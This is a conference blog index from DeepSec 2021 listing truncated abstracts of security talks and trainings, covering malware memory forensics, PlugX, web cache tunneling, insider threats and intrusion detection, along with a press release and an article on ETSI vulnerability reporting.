2709, 2021

DeepSec 2021 Talk: I Will Hide, You Come And Seek – Discovering The Unknown in Known Malwares using Memory Forensics – Shyam Sundar Ramaswami

Sanna/ September 27, 2021/ Conference

Malware analysis is a key phase to extract IOCs like domains, ip, mutex and other signatures. What if malware knows what online sandboxes look for and what tools look for, decides to “showcase only 90%” and hide the rest? Well, Memory forensics comes to our rescue. This was tried and tested with a lot of samples during the pandemic phase and was aided in extracting a lot of hidden process, domains, urls and even ip. This is what the talk covers: Talk about the traditional malware analysis process Introduction to memory forensics and why Introducing tools like Volatility and Rekall Running Orcus RAT, Agent Tesla and Sodinobki Ransomware malwares usingt traditional methods like Any.run online sandbox and malware runs Playing a game by capturing memory of the infected machine by invoking WMI module and

2409, 2021

DeepSec 2021 Talk: Do you have a PlugX? Artem Artemov, Rustam Mirkasymov

Sanna/ September 24, 2021/ Conference

Deep overview of a tool used by the Chinese nation-state APTs based on a real-life Incident Response case with a big industrial company. Investigation yielded the presence of PlugX in the infrastructure. This presentation gives a full overview of the tools functionality, its past versions, and nowadays usage (Thor is a new version of plugX). We show why it is hard to find and why it’s important for big industrial companies. And also we talk about our assumption that all recent big attacks – first Sunburst and then Exchange exploits (proxylogon related to Hafnium) are links of one chain. We asked Artem and Rustam a few more questions about their talk. Please tell us the top 5 facts about your talk. It’s about pro-government APT The described threat is silent The threat target is

2309, 2021

DeepSec 2021 Press Release: DeepSec and DeepINTEL Publish Conference Program

Sanna/ September 23, 2021/ Conference, DeepIntel, Press

IT security has a lot of catching up to do, digitization is on an insecure foundation. The COVID-19 pandemic will celebrate its second birthday next year. Our everyday life has become more dependent on digital tools and platforms. If you want to rely on the convenience of the digital world, data and communication must not be threatened by weak points. Unfortunately, this is not the case, which is why the annual DeepSec IT security conference will again address threats for companies and authorities this year. Expectations Digitization is largely viewed uncritically as a metaphorical bringer of salvation. It should make work easier, make information more accessible, reduce administration and, in principle, solve or at least reduce problems in every area. The term Artificial Intelligence is often used when promoting the future. In the key

2009, 2021

Hardware Security – Hacking on the Layer 1 – Training and Conference

René Pfeiffer/ September 20, 2021/ Conference

In system administration there is an easy way to distinguish between software and hardware: hardware are the parts that can be kicked. This happens usually when things break. Since breaking things is a major part of security research, we have teamed up with the Hardwear.io Security Conference. The Spectre and Meltdown bugs have shown that hardware is a crucial part of everyone’s security architecture. Few software developers realise that this foundation can cause a lot of havoc. So we recommend checking out the schedule. Reverse engineering hardware can be very rewarding, because you learn a lot on how it reacts to perturbations. There will be a training at Hardwear.io on how to do this with celullar baseband firmware. This piece of code sits on the gateway to the mobile network. During the training you

1709, 2021

DeepSec 2021 Talk: Revenge is Best Served over IOT – Chris Kubecka

Sanna/ September 17, 2021/ Conference

Welcome to the new Cold War in the Middle East. In 2012, Iran’s first Shamoon attacks almost crashed every world economy, nearly bringing the world to its knees. Since then, the game of spy vs. spy has intensified digitally with the pandemic accelerating connectivity. Join Chris on a 2.5 year Iranian espionage campaign attempting to recruit her for the most innocent of jobs: teaching critical infrastructure hacking with a focus on nuclear facilities. A journey of old school espionage with a cyber twist. Bribery, sockpuppets, recruitment handlers, propaganda VVIP luxury trip mixed with a little IOT camera revenge and 2021 police protection. We asked Chris a few more questions about her talk. Please tell us the top 5 facts about your talk. Our skills as ethical hackers are in high demand, especially by sanctioned

1309, 2021

DeepSec 2021 Presentation: Don’t get Hacked, get AMiner! Smart Log Data Analytics for Incident Detection – Florian Skopik, Markus Wurzenberger, Max Landauer

Sanna/ September 13, 2021/ Conference, Security

“Prevention is ideal, but detection is a must”. Active monitoring and intrusion detection systems (IDS) are the backbone of every effective cyber security framework. Whenever carefully planned, implemented and executed preventive security measures fail, IDS are a vital part of the last line of defence. IDS are an essential measure to detect the first steps of an attempted intrusion in a timely manner. This is a prerequisite to avoid further harm. It is commonly agreed that active monitoring of networks and systems and the application of IDS are a vital part of the state of the art. Usually, findings of IDS, as well as major events from monitoring, are forwarded to, managed and analyzed with SIEM solutions. These security information and event management solutions provide a detailed view on the status of an infrastructure

0909, 2021

Translated Article: New ETSI Standard for Reporting Security Vulnerabilities

Sanna/ September 9, 2021/ Stories

Neuer ETSI-Standard zur Meldung von Sicherheitslücken by Erich Moechel for fm4.ORF.at The European Standards Institute for Telecommunications ETSI, previously known more for the standardization of back doors for surveillance authorities than for IT security, is now concerned with finding non-standardized security vulnerabilities. Late but still, the discovery of ever new, critical security gaps in IT equipment in industry has finally woken up the European Standards Institute for Telecommunications (ETSI). The public review period for an ETSI specification, which is intended to standardize the reporting process of security vulnerabilities by third parties, runs until September 15. Since the introduction of LTE (4G), the standards of the IT world have increasingly applied to the formerly proprietary networks of the telecoms. This specification takes this into account by standardizing important IT security processes for the world of telecommunications. However,

0609, 2021

DeepSec 2021 Training: Advanced Deployment and Architecture for Network Traffic Analysis – Peter Manev & Eric Leblond

Sanna/ September 6, 2021/ Training

The foundation for effective intrusion detection and response is based on proper sensor placement and configuration. Sensor placement is crucial for developing a comprehensive network security and monitoring solution. Misconfigurations and improper placement can lead to gaps in network visibility, which can allow attackers to go undetected for prolonged periods of time and to penetrate deeper into your network. In Advanced Deployment and Architecture for Network Traffic Analysis, you will learn the skills necessary to successfully design, deploy and optimize a high-performance network monitoring and security solution. Filled with hands-on exercises and comprehensive demonstrations, this class will elevate your skills to maximize your network visibility and data management with Suricata. By the end of this course you will have gained a deep technical understanding and hands on experience with Suricata’s versatile arsenal of features

0209, 2021

DeepSec 2021 Talk: Real-Time Deep Packet Inspection Intrusion Detection System for Software Defined 5G Networks – Dr. Razvan Bocu

Sanna/ September 2, 2021/ Conference

The world of the Internet of Things apparently becomes fundamental for the envisioned always connected human society. The 5G data networks are expected to dramatically improve the existing 4G networks’ real world importance, which makes them particularly necessary for the next generation networks of IoT devices. This talk reports the authors experience, which was acquired during the implementation of the Vodafone Romania 5G networked services. Consequently, this blogpost about our talk describes a machine learning-based real time intrusion detection system, which has been effectively tested in the context of a 5G data network. The system is based on the creation of software defined networks, and it uses artificial intelligence based models for the deep inspection of the transferred data packets. It is able to detect unknown intrusions through the usage of machine learning-based software

0109, 2021

DeepSec 2021 Training: Mobile Security Testing Guide Hands-On – Sven Schleier

Sanna/ September 1, 2021/ Training

LIVE ONLINE TRAINING [Note: This training will be completely remote. This allows you to better plan your workshop commitments when booking tickets. You can also by a ticket for just attending this training (without access to the conference). In that case please write an e-mail to speaker@deepsec.net] Mobile apps are omnipresent in our lives and we are using more and more apps to support us, ranging from simple to complex daily tasks. Even though modern mobile operating systems like iOS and Android offer great functionalities to secure data storage and communication, these have to be used correctly in order to be effective. Data storage, inter-app communication, proper usage of cryptographic APIs and secure network communication are only some aspects that require careful consideration. The OWASP Mobile Security Testing Guide (MSTG) is a comprehensive manual

3108, 2021

DeepSec 2021 Talk: Web Cache Tunneling – Justin Ohneiser

Sanna/ August 31, 2021/ Conference

By using cache poisoning to store arbitrary data, we can use public web caches as open ephemeral storage to facilitate anonymous and evasive communication between network clients. We asked Justin a few more questions about his talk. Please tell us the top facts about your talk. Public web caches, when improperly configured, can be used as open ephemeral storage. Combined with a synchronization technique, this ephemeral storage can be used to tunnel arbitrary data between network clients. Tunneling data in this manner requires no listening service, as all endpoints behave as clients to the web cache server, allowing trivial use of anonymizing protocols. The conditions for this technique are present on several extremely popular websites, and the use of this technique by malware could make network detection nearly impossible. How did you come up

3008, 2021

DeepSec 2021 Training: Mobile Network Operations and Security – David Burgess

Sanna/ August 30, 2021/ Conference

This workshop describes security risks in mobile networks, both in the core network and in the radio network, based on case studies reported in the press. For each case, we will dig into the technical elements of what actually happened. The workshop will be especially useful for IT security people who are responsible for mobile devices but are not yet familiar with mobile network technology. The material will also be useful for anyone who works with individuals who have special security concerns, or who report on telecom security topics. The workshop will start with an overview of cellular technology in general and types of security flaws common to all mobile networks, and then proceed to specific examples for different network segments and technology types. The workshop will include demonstrations of some security failures and

2708, 2021

DeepSec 2021 Talk: Those Among Us – The Insider Threat facing Organizations – Robert Sell

Sanna/ August 27, 2021/ Conference

Organizations spend a considerable amount of time and money protecting themselves from external threats while practically ignoring the significant threats from within. Cybercrime has an estimated cost of $2 trillion in 2019 with an average cost per data breach of $3.9 million. This global cost is expected to grow to $6 trillion annually by 2021. In 2018, 34% of those data breaches involved internal factors and this trend continues to grow. This hard on the outside but soft in the middle approach by Information Security departments leaves organizations susceptible to a variety of insider threats that could be avoided. In this talk, I will present the extent of the issue, the types of insider threats to expect and how organizations can mitigate these risks. We asked Robert a few more questions about his talk.

2608, 2021

DeepSec 2021 Talk: How to Choose your Best API Protection Tool? Comparison of AI Based API Protection Solutions – Vitaly Davidoff

Sanna/ August 26, 2021/ Conference

As the world becomes more and more connected, Application Security becomes an important concern. Especially regarding the Internet of Things (IoT), Application Programming Interface (API), and Microservices spaces. In addition, the proper access management needs to be seriously addressed to ensure company assets are securely distributed and deployed. There are many tools on the market providing AI based API protection and anomaly detection but what really works? How to choose the best solution? During my talk, I will share results from the research of reviewing different architecture approaches and AI solutions introduced by different favorite tools on the market, from WAF to workload protection systems. We asked Vitaly a few more questions about his talk. 1) Please tell us the top facts about your talk. This talk is a first try to dive deep

2508, 2021

DeepSec 2021 Talk: Hunting for LoLs (a ML Living of the Land Classifier) – Tiberiu Boros, Andrei Cotaie

Sanna/ August 25, 2021/ Conference

Living of the Land is not a brand-new concept. The knowledge and resources have been out there for several years now. Still, LoL is one of the preferred approaches when we are speaking about highly skilled attackers or security professionals. There are two main reasons for this: Experts tend not to reinvent the wheel Attackers like to keep a low profile/footprint (no random binaries/scripts on the disk) This talk focuses on detecting attacker activity/Living of the Land commands using Machine Learning, for both Linux and Windows systems. Most of the AV vendors do not treat the command itself (from a syntax and vocabulary perspective) as an attack vector. And most of the log-based alerts are static, have a limited specter and are hard to update. Furthermore, classic LoL detection mechanisms are noisy and somewhat

Share this:

Share this:

Share this:

Share this:

Share this:

Share this:

Share this:

Share this:

Share this:

Share this:

Share this:

Share this:

Share this:

Share this:

Share this: